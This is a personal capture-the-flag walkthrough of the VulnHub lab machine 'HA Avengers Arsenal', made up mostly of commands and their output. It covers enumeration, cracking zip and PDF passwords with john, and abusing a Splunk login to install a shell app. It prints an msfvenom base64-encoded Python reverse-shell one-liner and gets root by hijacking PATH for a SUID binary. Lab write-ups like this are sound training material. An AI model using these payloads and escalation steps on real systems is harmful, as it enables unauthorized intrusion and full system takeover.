HA AVENGERS ARSENAL (VULNHUB)

root@kali:~/Downloads# nmap -A 192.168.48.133
Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-16 09:39 GMT
Nmap scan report for 192.168.48.133
Host is up (0.00029s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
| http-git:
| 192.168.48.133:80/.git/
| Git repository found!
| Repository description: Unnamed repository; edit this file ‘description’ to name the…
| Remotes:
|_ https://github.com/Ignitetechnologies/Web-Application-Cheatsheet.git
| http-robots.txt: 1 disallowed entry
|_/groot
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Avengers Arsenal
8000/tcp open http Splunkd httpd
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Splunkd
| http-title: Site doesn’t have a title (text/html; charset=UTF-8).
|_Requested resource was http://192.168.48.133:8000/en-US/account/login?return_to=%2Fen-US%2F
8089/tcp open ssl/http Splunkd httpd
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Splunkd
|_http-title: splunkd
| ssl-cert: Subject: commonName=SplunkServerDefaultCert/organizationName=SplunkUser
| Not valid before: 2019-09-16T14:51:44
|_Not valid after: 2022-09-15T14:51:44
MAC Address: 00:0C:29:B1:A3:8D (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 – 4.9
Network Distance: 1 hop

TRACEROUTE
HOP RTT ADDRESS
1 0.29 ms 192.168.48.133

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 31.50 seconds

now on browser

http://192.168.48.133/

http://192.168.48.133/.git/logs/HEAD

output :

0000000000000000000000000000000000000000 6820ee28fb8a3af055bbd9cafa4a707f8cb4392f root <root@ubuntu.(none)> 1568707264 -0700 clone: from https://github.com/Ignitetechnologies/Web-Application-Cheatsheet.git
go there :https://github.com/Hackingzone/hackingarticles.git </root@ubuntu.(none)>

root@kali:~/Downloads# git clone https://github.com/Hackingzone/hackingarticles.git
Cloning into ‘hackingarticles’…
remote: Enumerating objects: 30, done.
remote: Counting objects: 100% (30/30), done.
remote: Compressing objects: 100% (26/26), done.
remote: Total 30 (delta 7), reused 26 (delta 3), pack-reused 0
Unpacking objects: 100% (30/30), done.
root@kali:~/Downloads# cd hackingarticles/
root@kali:~/Downloads/hackingarticles# ls
Arrow.txt Avnge.txt Breaker.txt CA.txt ‘Chitauri Army.txt’ End.txt IW.txt ‘Mew mew.txt’ Ultron.txt
root@kali:~/Downloads/hackingarticles# git log
commit 8de2234e98b50c97e0355ec98ff9e7051d4c796e (HEAD -> master, origin/master, origin/HEAD)
Author: Hackingzone <hackingzone305@gmail.com>
Date: Tue Sep 17 14:28:44 2019 +0530</hackingzone305@gmail.com>

mew mew

commit c78e3ddf70b748d1aea5ccaf1fedc3aaab4ac451
Author: Hackingzone <hackingzone305@gmail.com>
Date: Tue Sep 17 14:28:12 2019 +0530</hackingzone305@gmail.com>

IW

commit a6b610652780fb3979ee9cbd8600e93b6b740700
Author: Hackingzone <hackingzone305@gmail.com>
Date: Tue Sep 17 14:27:43 2019 +0530</hackingzone305@gmail.com>

end

commit 674dc193bcdf5df2db43da89132f6efe08f3b1e8
Author: Hackingzone <hackingzone305@gmail.com>
Date: Tue Sep 17 14:27:16 2019 +0530</hackingzone305@gmail.com>

avnge

commit 9b5d48af1ef4d5123544cf3007a2363346e7dd4a
Author: Hackingzone <hackingzone305@gmail.com>
Date: Tue Sep 17 14:26:29 2019 +0530</hackingzone305@gmail.com>

chitauri army

commit 2bf255b0f23baddfcd00ee16b274b4ae54a5d6ee
Author: Hackingzone <hackingzone305@gmail.com>
Date: Tue Sep 17 14:25:28 2019 +0530</hackingzone305@gmail.com>

breaker

commit 3e4edf6dc8f9b24282f7df1cc6f181ea923119ec
:

root@kali:~/Downloads/hackingarticles# git log 4fb65717a4bdfa8169fb0642abf0f355f7eea048
commit 4fb65717a4bdfa8169fb0642abf0f355f7eea048
Author: Hackingzone <hackingzone305@gmail.com>
Date: Tue Sep 17 14:04:45 2019 +0530</hackingzone305@gmail.com>

Captain America

commit 78a6186c9f3cbc37234f521486948b657ffaadf4
Author: Hackingzone <hackingzone305@gmail.com>
Date: Tue Sep 17 14:01:13 2019 +0530</hackingzone305@gmail.com>

ultron
root@kali:~/Downloads/hackingarticles# git show 4fb65717a4bdfa8169fb0642abf0f355f7eea048
commit 4fb65717a4bdfa8169fb0642abf0f355f7eea048
Author: Hackingzone <hackingzone305@gmail.com>
Date: Tue Sep 17 14:04:45 2019 +0530</hackingzone305@gmail.com>

Captain America

diff –git a/CA.txt b/CA.txt
new file mode 100644
index 0000000..3fcec0d
— /dev/null
+++ b/CA.txt
@@ -0,0 +1,5 @@
+Captain America’s shield is his primary weapon. The most well-known of his shields is
+a disc-shaped object with a five-pointed star design in its center, within blue, red,
+and white concentric circles. This shield is composed of a unique Vibranium,
+Proto-Adamantium alloy, and an unknown third component.
+Q2FwdGFpbiBBbWVyaWNhJ3MgU2hpZWxkOnswNjE3ODZEOUE4QkI4OUEyRkU3NDVERDI2RkUyRTEzQ30=
\ No newline at end of file

root@kali:~/Downloads/hackingarticles# echo “Q2FwdGFpbiBBbWVyaWNhJ3MgU2hpZWxkOnswNjE3ODZEOUE4QkI4OUEyRkU3NDVERDI2RkUyRTEzQ30=” | base64 -d
Captain America’s Shield:{061786D9A8BB89A2FE745DD26FE2E13C}

root@kali:~/Downloads/hackingarticles# dirb http://192.168.48.133

—————–
DIRB v2.22
By The Dark Raver
—————–

START_TIME: Sat Nov 16 09:46:22 2019
URL_BASE: http://192.168.48.133/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

—————–

GENERATED WORDS: 4612

—- Scanning URL: http://192.168.48.133/ —-
+ http://192.168.48.133/.git/HEAD (CODE:200|SIZE:23)
==> DIRECTORY: http://192.168.48.133/css/
==> DIRECTORY: http://192.168.48.133/images/
+ http://192.168.48.133/index.html (CODE:200|SIZE:7165)
+ http://192.168.48.133/robots.txt (CODE:200|SIZE:31)
+ http://192.168.48.133/server-status (CODE:403|SIZE:279)

—- Entering directory: http://192.168.48.133/css/ —-
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode ‘-w’ if you want to scan it anyway)

—- Entering directory: http://192.168.48.133/images/ —-
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode ‘-w’ if you want to scan it anyway)

—————–
END_TIME: Sat Nov 16 09:46:27 2019
DOWNLOADED: 4612 – FOUND: 4

now on browser

http://192.168.48.133/images/

we get the list of files

http://192.168.48.133/images/17.jpeg

install this on firefox plugin

https://addons.mozilla.org/en-US/firefox/addon/qrcode-scanneroffline/?src=search

now on page right click -> QR scanner -> Decode QR

and we get spammimic

now try to access

http://192.168.48.133/spammimic/

http://192.168.48.133/spammimic/scepter.txt

http://www.spammimic.com/decodespace.cgi

we get

Scepter:{469F1394A349Dc}

now try

http://192.168.48.133/groot/

download the file hammer.zip

now try t access

http://192.168.48.133/avengersbook.html

root@kali:~/Downloads# git clone https://github.com/Mebus/cupp.git
Cloning into ‘cupp’…
remote: Enumerating objects: 194, done.
remote: Total 194 (delta 0), reused 0 (delta 0), pack-reused 194
Receiving objects: 100% (194/194), 99.99 KiB | 265.00 KiB/s, done.
Resolving deltas: 100% (103/103), done.

root@kali:~/Downloads# cd cupp/
root@kali:~/Downloads/cupp# ./cupp.py -i
___________
cupp.py! # Common
\ # User
\ ,__, # Passwords
\ (oo)____ # Profiler
(__) )\
||–|| * [ Muris Kurgas | j0rgan@remote-exploit.org ]
[ Mebus | https://github.com/Mebus/]

[+] Insert the information about the victim to make a dictionary
[+] If you don’t know all the info, just hit enter when asked! πŸ˜‰

> First Name: tony
> Surname: stark
> Nickname: ironman
> Birthdate (DDMMYYYY): 01052008

> Partners) name:
> Partners) nickname:
> Partners) birthdate (DDMMYYYY):

> Child’s name:
> Child’s nickname:
> Child’s birthdate (DDMMYYYY):

> Pet’s name:
> Company name:

> Do you want to add some key words about the victim? Y/[N]:
> Do you want to add special chars at the end of words? Y/[N]:
> Do you want to add some random numbers at the end of words? Y/[N]:
> Leet mode? (i.e. leet = 1337) Y/[N]:

[+] Now making a dictionary…
[+] Sorting list and removing duplicates…
[+] Saving dictionary to tony.txt, counting 2898 words.
[+] Now load your pistolero with tony.txt and shoot! Good luck!

root@kali:~/Downloads/cupp# locate zip2john
/usr/sbin/zip2john
root@kali:~/Downloads/cupp# cd ..
root@kali:~/Downloads# /usr/sbin/zip2john hammer.zip > hash
ver 2.0 efh 5455 efh 7875 hammer.zip/mjlonir.pdf PKZIP Encr: 2b chk, TS_chk, cmplen=195791, decmplen=197031, crc=D414E46C
root@kali:~/Downloads# john –wordlist /root/Downloads/cupp/tony.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 4 OpenMP threads
Press ‘q’ or Ctrl-C to abort, almost any other key for status
Stark12008 (hammer.zip/mjlonir.pdf)
0g 0:00:00:00 DONE (2019-11-16 10:13) 0g/s 354600p/s 354600c/s 354600C/s 123456..sss
Session completed

root@kali:~/Downloads# unzip hammer.zip
Archive: hammer.zip
[hammer.zip] mjlonir.pdf password: Stark12008
inflating: mjlonir.pdf

now try to open mjlonir.pdf

its prompted for password when we try to access the file.

root@kali:~/Downloads/ctf-tools# locate pdf2john
/usr/share/john/pdf2john.pl

root@kali:~/Downloads/ctf-tools# /usr/share/john/pdf2john.pl /root/Downloads/mjlonir.pdf > hashes

root@kali:~/Downloads/ctf-tools# john –wordlist /root/Downloads/cupp/tony.txt hashes
Using default input encoding: UTF-8
Loaded 1 password hash (PDF [MD5 SHA2 RC4/AES 32/64])
Cost 1 (revision) is 4 for all loaded hashes
Will run 4 OpenMP threads
Press ‘q’ or Ctrl-C to abort, almost any other key for status
0g 0:00:00:00 DONE (2019-11-16 10:24) 0g/s 118200p/s 118200c/s 118200C/s !@#$%..sss
Session completed

root@kali:~/Downloads/ctf-tools# john hashes –show

mjlonir.pdf:Tony_050081

use this on mjlonir.pdf and we get

MjΓΈlnir:{4A3232C59ECDA21AC71BEBE3B329BF36}

now see the source code

view-source:http://192.168.48.133/

we get this

http://192.168.48.133/ravagers.html

output :

61 67 65 6e 74 3a 61 76 65 6e 67 65 72 73

https://www.asciitohex.com/

put the content in hex box : 61 67 65 6e 74 3a 61 76 65 6e 67 65 72 73

and when we click on convert we get the text

agent:avengers

now try to access

http://192.168.48.133:8000/en-US/account/login?return_to=%2Fen-US%2F

username : agent
password : avengers

click sign in

and we are in

now download this zip file

https://github.com/TBGSecurity/splunk_shells/archive/1.2.tar.gz

back to portal

apps -> manage app -> install app from file

select that downloaded file and click upload

now on screen

Weaponize Splunk for Pentesting and Red Teaming splunk_shells-1.2 1.2
Yes

No
App | Permissions Enabled Edit properties | View objects | View details on Splunkbase

click on permission

select all apps (system)

click save

now click on app -> search and reporting ->

on search box

| revshell std 192.168.48.131 1234

and on terminal

root@kali:~# nc -lvnp 1234

on browser click on search box

we get the shell

root@kali:~/Downloads/ctf-tools# nc -lvnp 1234
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 192.168.48.133.
Ncat: Connection from 192.168.48.133:44484.

on another terminal

root@kali:~/Downloads/ctf-tools# msfvenom -p cmd/unix/reverse_python lhost=192.168.48.131 lport=4444 R
[-] No platform was selected, choosing Msf::Module::Platform::Unix from the payload
[-] No arch selected, selecting arch: cmd from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 609 bytes
python -c “exec(‘aW1wb3J0IHNvY2tldCwgICAgICAgICBzdWJwcm9jZXNzLCAgICAgICAgIG9zICAgICAgICA7ICAgICAgICAgaG9zdD0iMTkyLjE2OC40OC4xMzEiICAgICAgICA7ICAgICAgICAgcG9ydD00NDQ0ICAgICAgICA7ICAgICAgICAgcz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULCAgICAgICAgIHNvY2tldC5TT0NLX1NUUkVBTSkgICAgICAgIDsgICAgICAgICBzLmNvbm5lY3QoKGhvc3QsICAgICAgICAgcG9ydCkpICAgICAgICA7ICAgICAgICAgb3MuZHVwMihzLmZpbGVubygpLCAgICAgICAgIDApICAgICAgICA7ICAgICAgICAgb3MuZHVwMihzLmZpbGVubygpLCAgICAgICAgIDEpICAgICAgICA7ICAgICAgICAgb3MuZHVwMihzLmZpbGVubygpLCAgICAgICAgIDIpICAgICAgICA7ICAgICAgICAgcD1zdWJwcm9jZXNzLmNhbGwoIi9iaW4vYmFzaCIp’.decode(‘base64’))”

now on shell

id
uid=1001(splunk) gid=1001(splunk) groups=1001(splunk)
python -c “exec(‘aW1wb3J0IHNvY2tldCwgICAgICAgICBzdWJwcm9jZXNzLCAgICAgICAgIG9zICAgICAgICA7ICAgICAgICAgaG9zdD0iMTkyLjE2OC40OC4xMzEiICAgICAgICA7ICAgICAgICAgcG9ydD00NDQ0ICAgICAgICA7ICAgICAgICAgcz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULCAgICAgICAgIHNvY2tldC5TT0NLX1NUUkVBTSkgICAgICAgIDsgICAgICAgICBzLmNvbm5lY3QoKGhvc3QsICAgICAgICAgcG9ydCkpICAgICAgICA7ICAgICAgICAgb3MuZHVwMihzLmZpbGVubygpLCAgICAgICAgIDApICAgICAgICA7ICAgICAgICAgb3MuZHVwMihzLmZpbGVubygpLCAgICAgICAgIDEpICAgICAgICA7ICAgICAgICAgb3MuZHVwMihzLmZpbGVubygpLCAgICAgICAgIDIpICAgICAgICA7ICAgICAgICAgcD1zdWJwcm9jZXNzLmNhbGwoIi9iaW4vYmFzaCIp’.decode(‘base64’))”

now on another terminal

root@kali:~/Downloads/ctf-tools# nc -lvnp 4444
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 192.168.48.133.
Ncat: Connection from 192.168.48.133:47178.

python -c ‘import pty;pty.spawn(“/bin/bash”)’
splunk@ubuntu:/$

splunk@ubuntu:/$ find / -perm -u=s -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
/usr/lib/eject/dmcrypt-get-device
/usr/lib/xorg/Xorg.wrap
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/snapd/snap-confine
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/sbin/pppd
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/pkexec
/usr/bin/traceroute6.iputils
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/arping
/usr/bin/chsh
/usr/bin/vmware-user-suid-wrapper
/usr/bin/sudo
/snap/core/6350/bin/mount
/snap/core/6350/bin/ping
/snap/core/6350/bin/ping6
/snap/core/6350/bin/su
/snap/core/6350/bin/umount
/snap/core/6350/usr/bin/chfn
/snap/core/6350/usr/bin/chsh
/snap/core/6350/usr/bin/gpasswd
/snap/core/6350/usr/bin/newgrp
/snap/core/6350/usr/bin/passwd
/snap/core/6350/usr/bin/sudo
/snap/core/6350/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core/6350/usr/lib/openssh/ssh-keysign
/snap/core/6350/usr/lib/snapd/snap-confine
/snap/core/6350/usr/sbin/pppd
/snap/core/7713/bin/mount
/snap/core/7713/bin/ping
/snap/core/7713/bin/ping6
/snap/core/7713/bin/su
/snap/core/7713/bin/umount
/snap/core/7713/usr/bin/chfn
/snap/core/7713/usr/bin/chsh
/snap/core/7713/usr/bin/gpasswd
/snap/core/7713/usr/bin/newgrp
/snap/core/7713/usr/bin/passwd
/snap/core/7713/usr/bin/sudo
/snap/core/7713/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core/7713/usr/lib/openssh/ssh-keysign
/snap/core/7713/usr/lib/snapd/snap-confine
/snap/core/7713/usr/sbin/pppd
/snap/core18/1144/bin/mount
/snap/core18/1144/bin/ping
/snap/core18/1144/bin/su
/snap/core18/1144/bin/umount
/snap/core18/1144/usr/bin/chfn
/snap/core18/1144/usr/bin/chsh
/snap/core18/1144/usr/bin/gpasswd
/snap/core18/1144/usr/bin/newgrp
/snap/core18/1144/usr/bin/passwd
/snap/core18/1144/usr/bin/sudo
/snap/core18/1144/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core18/1144/usr/lib/openssh/ssh-keysign
/opt/ignite
/bin/umount
/bin/ping
/bin/su
/bin/fusermount
/bin/mount

splunk@ubuntu:/$ /opt/ignite
/opt/ignite
ens33: flags=4163<up,broadcast,running,multicast> mtu 1500
inet 192.168.48.133 netmask 255.255.255.0 broadcast 192.168.48.255
inet6 fe80::bcc8:6ddb:29d3:cda3 prefixlen 64 scopeid 0x20 ether 00:0c:29:b1:a3:8d txqueuelen 1000 (Ethernet)
RX packets 304262 bytes 410241299 (410.2 MB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 193092 bytes 81407657 (81.4 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0</up,broadcast,running,multicast>

lo: flags=73<up,loopback,running> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10
loop txqueuelen 1000 (Local Loopback)
RX packets 68503 bytes 61919972 (61.9 MB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 68503 bytes 61919972 (61.9 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0</up,loopback,running>

splunk@ubuntu:/$ cd /tmp
cd /tmp

splunk@ubuntu:/tmp$ echo “/bin/bash” > ifconfig
echo “/bin/bash” > ifconfig
splunk@ubuntu:/tmp$ chmod 777 ifconfig
chmod 777 ifconfig
splunk@ubuntu:/tmp$ export PATH=/tmp:$PATH
export PATH=/tmp:$PATH
splunk@ubuntu:/tmp$ /opt/ignite
/opt/ignite
root@ubuntu:/tmp# cd /root
cd /root
root@ubuntu:/root# ls
ls
final.txt

root@ubuntu:/root# cat final.txt
cat final.txt

β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ•— β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ•—
β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•”β•β•β•β•β•β–ˆβ–ˆβ•”β•β•β•β•β•β–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•‘
β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ•”β–ˆβ–ˆβ•— β–ˆβ–ˆβ•‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘
β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β•šβ•β•β•β•β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•”β•β•β• β–ˆβ–ˆβ•‘β•šβ–ˆβ–ˆβ•—β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘
β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ•‘ β•šβ–ˆβ–ˆβ–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—
β•šβ•β• β•šβ•β•β•šβ•β• β•šβ•β•β•šβ•β•β•β•β•β•β•β•šβ•β•β•β•β•β•β•β•šβ•β• β•šβ•β•β•β•β•šβ•β• β•šβ•β•β•šβ•β•β•β•β•β•β•

Storm Breaker:{0C683E44D2F04C6F62B99E87A38CF9CC}

@SAKSHAM DIXIT